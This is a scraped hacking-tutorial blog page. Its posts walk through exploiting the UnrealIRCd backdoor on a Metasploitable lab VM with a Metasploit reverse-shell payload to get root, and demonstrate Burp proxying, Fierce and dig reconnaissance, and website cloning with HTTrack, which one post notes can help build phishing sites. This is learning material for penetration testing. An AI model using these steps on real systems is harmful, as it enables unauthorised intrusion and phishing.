Social Icons

Showing posts with label Hack Tools. Show all posts
Showing posts with label Hack Tools. Show all posts

Saturday, October 24, 2015

IRC Exploit tutorial to hack into ROOT shell : Metasploitable 2 - Kali LInux 2

1.  root is the user name that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.For the hackers and cyber criminals,getting to root shell is the key to start doing the undesired.There are thousands of ways and options to get to this vide various exploits,tricks and hacks.In this post I give a step by step with screenshot guide to get to "root" of a Metasploitable machine from a Kali Linux machine.The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.This would come handy for beginners in this domain.I have two virtual machines for this test including one Metasploitable and one Kali Linux.

Setting up the Virtual Machines

Firstly,we need to configure the host only adapter settings as shown below in the Virtual box.

Click on Network - Host only networks tab and then "Add host only adapter" as shown below :
Edit the settings of the Host only adapter
Configure the IP address to any range as you desire.I have set up as seen below :
Now I have configured my VM Kali as per the following settings shown :
The Metasploitable machine configured as seen below :
Checking PING between the two machines


Playing with the setup : Running tools and exploits

The first thing to do is to run an nmap scan and see what services are running.At the terminal window on your Kali system,type the following :

nmap -sS -Pn

In our the Metasploitable Machine IP is 192.168.56.103.The “-sS” switch in the above command asks nmap to perform a stealth scan. The “-Pn” tells nmap not to run a ping scan to see what systems are up
Running nmap command with the “-A” switch, will perform OS detection and try to determine service versions.Running the command wil give us a screen output something like as shown below : 

nmap -sS -Pn -A 192.168.56.103
There are also a lot of services running as seen above but the one in particular we are interested is an Unreal Internet Relay Chat (IRC) program as highlighted below.In the screenshot below we see the software version, in this case “Unreal IRC 3.2.8.1′′. Our next step is to use Metasploit to exploit the vulnerability.
Get to the Kali terminal and type msfconsole to get this screen as seen below : 
The basic sequence of exploiting a vulnerability goes as shown below :

- Picking an Exploit
- Setting Exploit Options
- Picking a Payload
- Setting Payload Options
- Running the Exploit
- Connecting to the Remote System

Going further now at the msf terminal type : use exploit/unix/irc/unreal_ircd_3281_backdoor
Next we need to set the RHOST as per the following terminal command:

RHOST 192.168.198.145(Metasploitable IP address )
At the msf terminal,type “show payloads” to display all payloads that work with the exploit:
Now we will use the generic reverse shell. This will give us the terminal shell with the target when the exploit is finished.Type the following at the msf terminal:

set payload cmd/unix/reverse
Show options command further will give the current settings as configured :
So we see above LHOST remains to be configured and we configure it now as follows :

Running the show options command again shows the configured setup as desired : 
and now the final bullet...simply type : exploit at the msf terminal
and here you are...right at the terminal@root
Just make a directory for testing it at the victim Metasploitable machine.I have made by the name of anupam and we see the same at the second terminal window seen in the screenshot below :
...that's it guys...any questions...most welcome...

Thursday, October 22, 2015

segmentation fault Kali Linux 2.0 [solved]

Kali Linux 2.0,the well known Penetration testing distro contains a plethora for digital forensics tools and is widely used by ethical hacker community across the globe.It comes with over 650 tools pre-installed that help  perform tasks like network analysis, ethical hacking, load & crash testing etc. It is powered by Linux kernel 4.0 and has enhanced support for different graphics cards and desktop environments.However ,a small bug as I noticed running two regular commands as apt-get update and msfupdate. Used to get the segmentation fault error as seen below in the screen shot :


Resolved by running the following commands at terminal to open sources.list  file

root@kali:~# leafpad /etc/apt/sources.list

As the file opens, simply select all the existing content in the file and delete it.Further to it cut and paste the following lines in the file and save :  

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

and now it should work just as it worked in my case as seen below :



Thursday, October 01, 2015

Burp Suite : Configuring the browser and redirecting traffic

1.   Vide my last post about installing Burp Suite here ,now I move ahead to configure your browser in order to redirect all HTTP/S requests through Burp Proxy, instead of the actual target website. In my case here I am configuring a Mozilla Browser with proxy host address to 127.0.0.1 and the proxy port to 8080 , for both HTTP and HTTPS.The typical configuring of browsers is more or less common with major browsers with minor differences in interfaces.Here next I place you screen shots as I surfed a redirected traffic both for http and https via Burp Suite.First steps to configure Mozilla followed by screen shots :

Configuring Mozilla Firefox

- Click Firefox menu and then Preferences.
- In the Advanced options, under the Network tab, click on connection Settings.
- Select Manual proxy configuration.
- Enter the proxy host address as 127.0.0.1 and the proxy port as 8080.
- Select Use this proxy server for all protocols.
- Make sure to remove all exceptions from the No Proxy for field.
- Click OK and close.


2.   So now you have a working installation of Burp Suite and your browser is properly configured to intercept all requests.Now to test go to the browser, enter any http://www.****** site in the address bar and press Enter . If all is well, Burp Proxy should intercept this request. In Burp Suite,go to the Proxy and Intercept tab and verify that the web request is waiting for your approval.Ensure tha the Intercept on button is enabled; click on it and allow the request to transit through Burp by pressing Forward in Burp Suite Interface. Now in the browser, you should see the http page you entered in address bar.

Now try a https site and you are bound to see this warning as seen below in the screenshot.You will be presented with a This Connection is Untrusted page.In such a case, you are required to manually approve the connection by clicking on I Understand The Risks, then Add Exceptions... and Confirm Security Exception. To make sure that Burp Proxy is actually causing the warning, you click on the certificate status View... and see that the certificate belongs to PortSwigger CA as seen below in one screenshot.

 PortSwigger CA certificate


This setup means that Burp Suite is now ready for use as the traffic is being redirected as desired as per configuration....

Sunday, August 03, 2014

Fierce Domain Scan by FIERCE @ Kali Linux

1.   This post gives a stepped screen shot version of a relatively unknown but powerful tool known as Fierce. It is a perl script written by rsnake. Fierce tries multiple techniques to find all the IP addresses and hostnames used by a target. Fierce is meant specifically to locate likely targets both inside and outside a corporate network.A very detailed explanation with ease is given at http://ha.ckers.org/fierce/

2.  To use Fierce, navigate to Information Gathering | DNS Analysis | Fierce.
Fierce will load into a terminal window as shown in the following screen shot.



DOMAIN INFORMATION GROPER : DIG@Kali LINUX

1.    Most high-value targets have a DNS name associated to an application. DNS names make it easier for users to access a particular service and add a layer of professionalism to their system. For example, if you want to access Google for information, you could open a browser and type in 74.125.68.138 or type www.google.com

(Click on image to enlarge)
2.  DNS information about a particular target can be extremely useful to a Penetration Tester. DNS allows a Penetration Tester to map out systems and subdomains. To use Dig, open a command prompt and type dig and hostname, where hostname represents the target domain. 

3.  Dig lookups will show the DNS records for the given host or domain. This gateway allows lookups for network address, mail exchanger, name servers, host information, arbitrary strings and zone of authority records. Please leave the server field blank to query a properly configured internet DNS cache.Dig will use your operating systems default DNS settings to query the hostname.You can also configure Dig to query custom DNS servers by adding @ to the command. The example in the following screen shot illustrates using Dig on http://www.hacklabs.com/

 
4.   The -t option in Dig will delegate a DNS zone to use the authoritative name
servers. We type dig -t ns http://www.hacklabs.com/ in the example in the
following screen shot:

5.  We see from the results we have two authoritative DNS servers for the domain http://www.hacklabs.com/; they are ns51.domaincontrol.com and ns51.domaincontrol.com

6.   Thanks to book Web Penetration Testing with Kali Linux by Joseph Muniz & Aamir Lakhani

HTTrack : Clone a Website@KALI LINUX

1.    This post will introduce you with a well known tool to clone a website ..the tool is known as HTTrack...though is inbuilt into Kali but older versions may not have it... The purpose of HTTrack is to copy a website.It allows a Penetration Tester to look at the entire content of a website, all its pages,and files offline, and in their own controlled environment. Needless to emphasize on the importance and usefulness of having a copy of a website that could be used to develop fake phishing websites, which can be incorporated in other Penetration Testing toolsets.To install HTTrack if not already inbuilt in Kali, open a Terminal window and type in the following as shown in the following screenshot.

apt-get install httrack 

(Click on image to enlarge)

(Click on image to enlarge)

(Click on image to enlarge)

2.  Firstly we will create a directory to store the copied website. The following
screenshot shows a directory created named testwebsite using the mkdir command.

3.   To start HTTrack, type httrack in the command window and give the project
a name, as shown in the following screen shot:

(Click on image to enlarge)

(Click on image to enlarge)
 4.   The next step is to select a directory to save the website. The example in the
following screen shot shows the folder created in the previous step /root/
testwebsite
, used for the directory:

(Click on image to enlarge)
5.   Enter the URL of the site you want to capture. The example in the following
screen shot shows www.hackershandbook.org. This can be any website. Most attacks use a website accessed by clients from your target, such as popular social media websites or the target's internal websites.The next two options are presented regarding what you want to do with the captured site. Option 2 is the easiest method, which is a mirror website with a wizard as shown in the following screen shot:

(Click on image to enlarge)
6.  Next, you can specify if you want to use a proxy to launch the attack. You can also specify what type of files you want to download (the example in the following screen shot shows * for all files). You can also define any command line options or flags you might want to set. The example in the following screen shot shows no additional options.Before httrack runs, it will display the command that it is running. You can use this command in the future if you want to run httrack without going through the wizard again. The following screen shots show hhtrack cloning www.hackershandbook.org:

(Click on image to enlarge)

(Click on image to enlarge)
7.   After you are done cloning the website, navigate to the directory where you
saved it. Inside, you will find all your files and web pages, as shown in the
following screen shot:
(Click on image to enlarge)
8.   Thanks to book Web Penetration Testing with Kali Linux by Joseph Muniz & Aamir Lakhani

Powered By Blogger